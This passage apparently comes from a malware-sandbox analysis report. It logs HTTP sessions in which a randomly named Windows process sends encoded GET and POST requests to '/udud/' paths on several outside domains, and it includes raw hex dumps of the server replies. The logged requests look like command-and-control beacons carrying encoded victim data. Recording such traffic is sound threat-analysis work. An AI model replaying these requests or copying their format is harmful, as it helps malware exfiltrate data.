Pl9P8ldX=sEt6YslxHAvnxuS8no45UP33M3dPzDLF0RZ/HmHq/SAvV1Yo0CSNCW3O484rjm7QntQPR/dfwiupniBS39swgE2mvdRh7QAU0HzHNcvHgce5GWcWpi/deslUumhtO7kQ9mZQiSwbinN3aXpAw4vlv/4MAvBWa/F/sStVrX74f9EHdqQx/7xJPlFLWrRihLHCPdgeTYAs87Yg/Ka2zeLzfjCX9ADcXq8EUy9nZeMio8AraO+UY9rELrRbdEH2jIQ9I57/TeWcPRsmbLC7GH2CkVS39Wt/qZez3Qpj9wIDBY0uBiXhKIP1DOWJEqYmBRyd55tVtb7BqzpCAuuiU1do1nbdVjUCxyh8HalcUL5W82mo1KlrPKKG8tMGEYJdZccHZLjJIZfXtQPEUYn+bHPbeS8tN99TTDU4QHDVTfzw4Ufph17/s/k7wGFWKmG7iZ9/2yEXr3+krAbQ+/vJEs9hGNNKAG+hIdkd4GXZTet7B8WhjkjAwUT/NsVO9rByRf//+w6TqUwjdKjTLI0lbJZPy+KxH3v6bDJ+AP9S9jLUzsBhQBM8woASeoN4/0n++aeOKaKdVoAp4O7GRA1QtcZ8K4JtDA0v/LhrD+2XySgkEkTDz/rpig4eCm7pTdUJoApZQoIvpRmS+NV9ua9jamCFakKU23pfkh7at0Vpgjyi7nwUFQ+OySUAvAQK12gw77yNo0ivpZTVvmD4xbwzqpIIo7Zc9tSk5j/Nqyh03p8C2NA1hncAMAc8LBMX3c4uyGAHW0pR0wyL9NSwsL5qHAqRGPOrtbsfwgcYn9srligj/wC6DRgSVL4EH8r3D5RFAXsq5eA0ZQ+R8DCCmDL/3hQEO5DUOBJnFIntQMlh2y9SrJ9bJp8dP1hL5Tpezm40TIrahR/O3SuclIDxwopGV6EO4ZmQoLNU88e5BB5mQP74GfwKt19jxJ5eWTEdorfR85nfKkTGBUvL0vbgWDyKj8kiEb0RQkm/CKRvoLT+Z4uDsJ6 [TRUNCATED]
                                                                                                May 27, 2024 12:32:07.986896038 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:07 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=9usfs89hqp99jbkv3l42n50su4; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 [TRUNCATED]
                                                                                                Data Ascii: 3794}mws? F_%"v,[ H"&%~?S4"N|XKUUo<3fO4UkZqI0?*yzT;jQ?*JU<aIi~EU*1I34]/$27PO4pFiBYy?4zE6Vl!"kpC&nz3a>9g0V4^t Q>vH4>449-lz{4fT_Z8w,E-^Ol~Lp#4{g`8\efqv~(,o<3$Q7S@ g3/kDo7ap;$m8&apAU>Qkd0,D>FGW'x2:MSY_*k?8`z'aE$[ZkS?3#EF*Z3XU/mt%bRZ-F5"![ju}aJhiS>%w'Qj28|1Y<7lGZk'k!7Bh:-^E+'|rg(qVQ7&m0X9<{{idN2<'ow0uCXW/{Q7
                                                                                                May 27, 2024 12:32:07.987020016 CEST1289INData Raw: c5 0c 3a c3 fd 6d 11 24 77 57 c1 14 a6 58 9c 9c 4c a7 3b 7f a3 ad e6 3c 76 28 34 df 50 62 ff cf 5e 05 82 b7 f2 ee 8d 96 b5 f7 2f e2 77 7f db 7d 14 1c 67 2e 14 d2 38 9b 3c 0a be ff 7e 37 7b 13 bc 73 93 60 16 df 04 27 19 54 d6 60 91 05 3b 15 23 f4
                                                                                                Data Ascii: :m$wWXL;<v(4Pb^/w}g.8<~7{s`'T`;#*lgwOcf:z1Hv*I@U+a#1gSeLDx-Ke1QuI@ze$NEr2$w0"@]0vwvs
                                                                                                May 27, 2024 12:32:07.987149954 CEST1289INData Raw: 9c c2 d5 c8 c5 3b 8e e3 31 ac 62 6f 3c f3 22 8c 2e a1 87 10 ee 4b 97 fe ce 1f c2 61 ef a7 eb 8b ea 7e bb 79 71 71 f5 bc a2 40 4c 02 3a 39 7a e0 1b f5 59 b9 4f f2 8f a2 c4 7a b4 6e c1 f1 77 47 90 1b c1 a3 9b 30 0d a1 2b c3 ec ee 68 12 0e 87 41 a4
                                                                                                Data Ascii: ;1bo<".Ka~yqq@L:9zYOznwG0+hA>VkEx\+?L,?~ZU'F~H3*SU]%UnTxP'hR@*"hwcf_fY5209];\h:1X5`5PN
                                                                                                May 27, 2024 12:32:07.987196922 CEST1289INData Raw: ab a3 30 49 95 e1 aa 84 75 09 81 51 d5 97 b5 61 99 7f 61 e6 0c e4 54 49 ad 5b 5b c9 86 d8 c1 54 1e 9f 3f 77 2e 4e ae 5f 9d 5f bc 7c 71 fe d2 79 72 ee 6c b6 06 95 11 08 96 53 26 16 ba 36 18 2f 91 ff 6b f0 b8 5e 64 19 9c eb f0 dc c3 b9 8e a7 24 84
                                                                                                Data Ascii: 0IuQaaTI[[T?w.N__|qyrlS&6/k^d$Aw ?sQ/X1(Xt?aCTduK&B:rKHJq;)H#)DNnpE6"n;~AbSWNzM1K$IBrK<UpcX:[2tnv1
                                                                                                May 27, 2024 12:32:07.987263918 CEST1289INData Raw: 03 74 c3 75 4d 89 07 11 23 c8 08 62 6d fd dc 70 81 80 5e 3d 55 08 4f 3d 28 ce 37 c5 0f ea b6 3a 10 cf 90 c1 4d f0 c5 61 b3 29 18 1e a8 67 10 53 96 07 a6 88 b4 16 5a 92 d6 3f 73 96 b1 a2 73 62 73 10 24 32 b0 50 d4 06 19 01 96 c2 a4 db 66 3b 88 4a
                                                                                                Data Ascii: tuM#bmp^=UO=(7:Ma)gSZ?ssbs$2Pf;J(w[.xC1FK:4s,R+B|8UO!@(r-M}3.^\<Flz}6]>OW/+bhA*Qg^NSuV+qFeOGz;Xup-H
                                                                                                May 27, 2024 12:32:07.987320900 CEST1289INData Raw: 7e f6 f2 f5 75 ff e7 93 eb ca d1 c8 9b a6 c1 5e 65 43 83 93 27 4f ce af cf 5f be 38 79 be 4d ed ab 67 e7 97 97 e8 b0 7f fa f2 ca 80 06 c2 08 ae ff 15 eb ab cf 18 0e 61 c3 f4 82 d2 84 42 6e c1 38 1b 83 43 a8 de 63 13 05 fb ce bf cb df cb e8 fa 99
                                                                                                Data Ascii: ~u^eC'O_8yMgaBn8CcD94$|l;M:}1g/hm^#Gb_=Gsq~[{[[6&~r SC?zU0q%"`-o<n5g)c$i D_$jzTf:^k%
                                                                                                May 27, 2024 12:32:07.987353086 CEST1289INData Raw: d2 25 4c cf b8 1d c9 3f 4f bc 14 02 74 9c 7f 0e d3 4b c5 14 4f 40 b9 70 6a bd 67 de 3d c4 f8 d2 7b 3d ce be a2 3a b7 3b 80 28 5d 9c c0 33 7c 07 0b b1 10 52 e3 6b 4f a6 4a 51 6e 7c 32 4c 39 71 86 d0 4c cc 26 93 0f 44 9d 3f 39 b9 3e eb 5f 9f 5f 9c
                                                                                                Data Ascii: %L?OtKO@pjg={=:;(]3|RkOJQn|2L9qL&D?9>__n$zuu_RoHMcNrAo5}4Imq[9M|h=}nM~iN]uA)"hiwwjxi`W^SeP
                                                                                                May 27, 2024 12:32:07.987431049 CEST1289INData Raw: 74 9c 9d 14 17 97 ed 62 16 bd d4 91 be 60 3e a0 0f 2f c6 34 7a 90 80 e8 66 31 f5 92 9c e0 0f 8f 9f e3 86 77 81 8e 13 43 8a fb 46 ad e7 22 41 24 26 46 c5 71 cc f2 e1 0d e3 59 e8 23 b6 0b fd 3b 27 f9 db 62 a4 08 0d 03 13 62 a0 b8 89 d8 1b cb f0 11
                                                                                                Data Ascii: tb`>/4zf1wCF"A$&FqY#;'bbB`v;w1qcC0E-EJ\2$84a+%e\*SJ]1Qg4uj4x#,P*Dk"#9}2_h,7w{kP}j7B>|/Jr>/9q$
                                                                                                May 27, 2024 12:32:07.987518072 CEST1289INData Raw: 1e 14 7d 37 c3 86 6d f1 25 d8 3f 60 a5 be 86 be a0 9d 03 61 fe 72 41 b6 3d 83 b1 a4 09 8f 48 7a 1e e7 ab 43 fa 4b 58 41 ff 04 6e f8 e6 2b 11 bb 2f 16 f1 0d 5c b9 30 44 ee ad 3d 4f f0 55 3e 4c 18 81 5a 46 5d 58 21 c8 3e 94 58 bc a2 19 7c 24 e6 1c
                                                                                                Data Ascii: }7m%?`arA=HzCKXAn+/\0D=OU>LZF]X!>X|$Jw~0C}F-1]j }:]$[o(Zdz`}I"A1$2N7~Sv7&:S5E4;8]m)ODfZWXELJ
                                                                                                May 27, 2024 12:32:07.987566948 CEST1289INData Raw: 96 fa 20 9a af 02 78 c5 99 0b 5a b9 c0 66 09 33 69 36 6f 70 b3 a2 00 f1 a3 eb bb e3 37 f4 6a 11 70 ca af 45 db 50 8b d7 7f 5c 16 bb 58 32 2d 6b e3 c6 83 f5 0d 70 10 e1 4f ce 23 8b 78 e7 76 c2 da 89 f6 ef 70 fb 2b 8e 79 31 3f 73 1f fa f9 93 33 7c
                                                                                                Data Ascii: xZf3i6op7jpEP\X2-kpO#xvp+y1?s3|OWQ[Llu=M7_vE (%3{V{?*3YPIgKopQ_<0K#F+:CCN[jiAKpPxU]dak!`8^Xy0d
                                                                                                May 27, 2024 12:32:08.172928095 CEST1289INData Raw: 62 48 f1 fd a1 62 94 0b 46 a8 bd c0 81 1b ee a8 5b aa ff 5a de ae 6f 01 9f 6b 92 f5 71 93 87 34 c2 37 98 cc 06 b8 17 80 47 30 16 72 57 ac 84 9c 50 54 93 f1 3b 17 52 cd 39 61 35 85 27 82 d6 1f 82 72 86 1b f8 ee 85 01 f3 fa b6 2f 91 62 72 b9 cc 0a
                                                                                                Data Ascii: bHbF[Zokq47G0rWPT;R9a5'r/brUab$y[)^IP<ncFck%\H,!!a)PM7Ziz-3O^1RDTW*#Bl1>R2]G,&>p_p6{ScL-]!


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.11.30498423.73.27.108807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:09.450150967 CEST485OUTGET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:32:09.701061010 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=ivb4pecgn5jglcq8ucmv9i37gr; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 61 31 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 [TRUNCATED]
                                                                                                Data Ascii: a148<!DOCTYPE html><html class="no-js" prefix="og: https://ogp.me/ns#" lang="it"><head><link rel="preconnect" href="https://d1di2lzuh97fh2.cloudfront.net" crossorigin><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><meta charset="utf-8"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957" type="image/svg+xml" sizes="any"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957" type="image/svg+xml" sizes="16x16"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="apple-touch-icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>40
                                                                                                May 27, 2024 12:32:09.701138020 CEST1289INData Raw: 34 20 2d 20 50 61 67 69 6e 61 20 6e 6f 6e 20 74 72 6f 76 61 74 61 20 3a 3a 20 6d 61 74 72 69 6d 6f 6e 69 6f 76 61 6c 65 6e 74 69 6e 61 65 74 6f 6d 6d 61 73 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77
                                                                                                Data Ascii: 4 - Pagina non trovata :: matrimoniovalentinaetommaso</title> <meta name="viewport" content="width=device-width,initial-scale=1"> <meta name="msapplication-tap-highlight" content="no"> <link href="https://d1di2lzuh97fh2.cloudfront.
                                                                                                May 27, 2024 12:32:09.701184988 CEST1289INData Raw: 61 2f 31 61 6e 2f 31 61 6e 66 70 67 2e 63 73 73 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 64 61 74 61 2d 77 6e 64 5f 74 79 70 6f 67 72 61 70 68 79 5f 66 69 6c 65 3d 22 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                Data Ascii: a/1an/1anfpg.css?ph=cb3a78e957" data-wnd_typography_file=""><link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957" data-wnd_typography_desktop_file="" media="screen and (min-width:37.5em)" dis
                                                                                                May 27, 2024 12:32:09.701277018 CEST1289INData Raw: 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 63 6f 72 72 65 74 74 6f 2e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61
                                                                                                Data Ascii: a se hai inserito l'indirizzo corretto."><meta name="keywords" content=""><meta name="generator" content="Webnode 2"><meta name="apple-mobile-web-app-capable" content="no"><meta name="apple-mobile-web-app-status-bar-style" content="black"><met
                                                                                                May 27, 2024 12:32:09.701380968 CEST1289INData Raw: 28 76 61 72 20 67 3d 31 3b 33 3e 3d 67 3b 67 2b 2b 29 62 2b 3d 28 22 30 22 2b 70 61 72 73 65 49 6e 74 28 68 5b 67 5d 2c 31 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 32 29 3b 22 30 22 3d 3d 3d 62 2e 63 68 61 72 41 74
                                                                                                Data Ascii: (var g=1;3>=g;g++)b+=("0"+parseInt(h[g],10).toString(16)).slice(-2);"0"===b.charAt(0)&&(d=parseInt(b.substr(0,2),16),d=Math.max(16,d),b=d.toString(16)+b.slice(-4));f.push(c[e][0]+"="+b)}if(f.length){var k=a.getAttribute("data-src"),l=k+(0>k.in
                                                                                                May 27, 2024 12:32:09.701513052 CEST1289INData Raw: 2d 63 6c 61 73 73 69 63 20 77 6e 64 2d 6e 61 2d 63 20 6c 6f 67 6f 2d 63 6c 61 73 73 69 63 20 73 63 2d 77 20 20 20 77 6e 64 2d 77 2d 77 69 64 65 72 20 77 6e 64 2d 6e 68 2d 6d 20 68 6d 2d 68 69 64 64 65 6e 20 6d 65 6e 75 2d 64 65 66 61 75 6c 74 22
                                                                                                Data Ascii: -classic wnd-na-c logo-classic sc-w wnd-w-wider wnd-nh-m hm-hidden menu-default"><div class="s-w"><div class="s-o"><div class="s-bg"> <div class="s-bg-l"> </div></div><div class="h-w h-f wnd-f
                                                                                                May 27, 2024 12:32:09.701579094 CEST1289INData Raw: 09 3c 2f 6c 69 3e 3c 6c 69 3e 0a 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 2f 69 6c 2d 67 69 6f 72 6e 6f 2d 64 65 6c 2d 6d 61 74 72 69 6d 6f 6e 69 6f 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                                                Data Ascii: </li><li><a class="menu-item" href="/il-giorno-del-matrimonio/"><span class="menu-item-text">Il giorno del matrimonio</span></a></li><li><a class="menu-item" href="/conferma-partecipazione/"><span class="menu-item-text">Conferma pa
                                                                                                May 27, 2024 12:32:09.701780081 CEST1289INData Raw: 65 20 63 6f 6e 74 72 6f 6c 6c 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 63 6f 72 72 65 74 74 6f 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e
                                                                                                Data Ascii: e controlla se hai inserito l'indirizzo corretto.</p></div></div></div></div></div></div></div></section></div></div> </main> <footer class="l-f cf"> <div class="sw cf"><div class="sw-c cf"><
                                                                                                May 27, 2024 12:32:09.701811075 CEST1289INData Raw: 6c 69 6e 6b 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0d 0a 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: link"> <a href="#" rel="nofollow">Cookies</a></span> </div> <div class="s-f-l-c-w"> <div class="s-f-lang lang-select cf"></div>
                                                                                                May 27, 2024 12:32:09.701889038 CEST1289INData Raw: 2e 36 35 20 36 35 2e 38 39 33 20 35 2e 36 35 73 36 2e 31 32 37 20 31 2e 31 36 20 36 2e 31 32 37 20 36 2e 37 30 37 7a 6d 2d 31 2e 38 34 38 20 30 63 30 2d 33 2e 34 38 2d 31 2e 32 37 2d 35 2e 30 30 34 2d 34 2e 32 34 32 2d 35 2e 30 30 34 2d 32 2e 39
                                                                                                Data Ascii: .65 65.893 5.65s6.127 1.16 6.127 6.707zm-1.848 0c0-3.48-1.27-5.004-4.242-5.004-2.936 0-4.205 1.523-4.205 5.004 0 3.48 1.27 5.003 4.205 5.003 2.937 0 4.242-1.523 4.242-5.003zM25.362 5.65c-5.91 0-5.693 5.51-5.693 6.888 0 5.402 3.226 6.526 5.945
                                                                                                May 27, 2024 12:32:09.885179996 CEST1289INData Raw: 2e 37 32 20 30 2d 35 2e 39 34 36 20 31 2e 31 36 2d 35 2e 39 34 36 20 36 2e 35 36 33 20 30 20 35 2e 39 38 32 20 33 2e 35 39 20 36 2e 38 39 20 35 2e 37 32 38 20 36 2e 38 39 20 34 2e 39 33 20 30 20 35 2e 32 39 34 2d 33 2e 31 35 35 20 35 2e 32 39 34
                                                                                                Data Ascii: .72 0-5.946 1.16-5.946 6.563 0 5.982 3.59 6.89 5.728 6.89 4.93 0 5.294-3.155 5.294-4.098V.9h-1.886z" fill="#FFF"></path> </svg> </span> </a></div></div><section class="cb cb-dark" id="cookiebar" style="display:none;"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                13192.168.11.3049843203.161.49.193807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:23.763503075 CEST742OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 43 75 6d 37 43 4d 7a 76 4d 54 35 73 61 48 5a 53 61 47 7a 31 76 30 61 61 6f 30 44 53 78 78 6f 75 6b 72 36 38 30 66 4a 57 57 4e 53 4f 64 75 47 4a 2b 55 5a 64 63 46 71 36 41 33 52 69 34 6c 73 52 6d 50 33 34 4a 75 33 6e 36 6c 44 6a 46 6a 41 67 50 42 41 65 76 4c 66 79 48 66 45 58 39 72 61 51 58 59 66 75 43 54 70 37 4b 64 59 65 36 55 43 41 4d 65 6f 4a 39 45 46 7a 30 41 4e 48 55 6d 43 6c 49 76 6f 2f 36 72 2f 79 45 4b 4c 7a 58 61 4b 78 4a 67 52 4a 6f 4c 68 36 64 76 31 54 48 48 6f 43 58 68 70 4b 41 43 65 52 57 71 50 2b 44 48 49 79 6c 63 55 4b 5a 6f 63 46 78 73 6e 54 32 6b 36 50 42 51 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5saHZSaGz1v0aao0DSxxoukr680fJWWNSOduGJ+UZdcFq6A3Ri4lsRmP34Ju3n6lDjFjAgPBAevLfyHfEX9raQXYfuCTp7KdYe6UCAMeoJ9EFz0ANHUmClIvo/6r/yEKLzXaKxJgRJoLh6dv1THHoCXhpKACeRWqP+DHIylcUKZocFxsnT2k6PBQ==
                                                                                                May 27, 2024 12:32:23.958302975 CEST533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:32:23 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.11.3049844203.161.49.193807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:26.454904079 CEST762OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
